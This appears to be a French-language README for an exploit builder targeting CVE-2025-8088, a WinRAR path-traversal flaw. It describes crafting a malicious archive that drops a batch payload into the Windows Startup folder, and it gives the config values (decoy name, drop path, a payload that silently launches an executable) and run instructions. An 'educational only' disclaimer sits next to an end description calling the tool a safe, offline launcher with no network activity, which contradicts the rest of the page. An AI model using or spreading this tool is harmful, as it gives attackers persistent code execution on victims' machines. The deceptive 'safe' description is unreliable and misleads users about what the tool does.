
CVE-2025-8088-BUILDER
⚠ Cet outil est créé uniquement à des fins éducatives. Toute utilisation non autorisée en dehors d'environnements contrôlés est strictement interdite.
Un script Python qui exploite CVE-2025-8088, une vulnérabilité de traversée de chemin dans WinRAR, en générant une archive malveillante qui place des charges utiles exécutables dans le dossier de démarrage de Windows en utilisant plusieurs niveaux de répertoires relatifs pour garantir une exécution fiable quel que soit l'emplacement d'extraction.
Configurez le fichier config.py
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
Pour utiliser votre propre fichier leurre, tapez son chemin complet au lieu du nom.
Exécutez le script :
python CVE-2025-8088.py
La sortie apparaîtra dans le dossier output.
Cet outil est créé uniquement à des fins éducatives. Toute utilisation non autorisée en dehors d'environnements contrôlés est strictement interdite.
Auteur : Desert Scripts
Description :
Un lanceur local et hors ligne qui exécute MyAppInstaller.exe.
Aucune activité réseau. Sûr et transparent.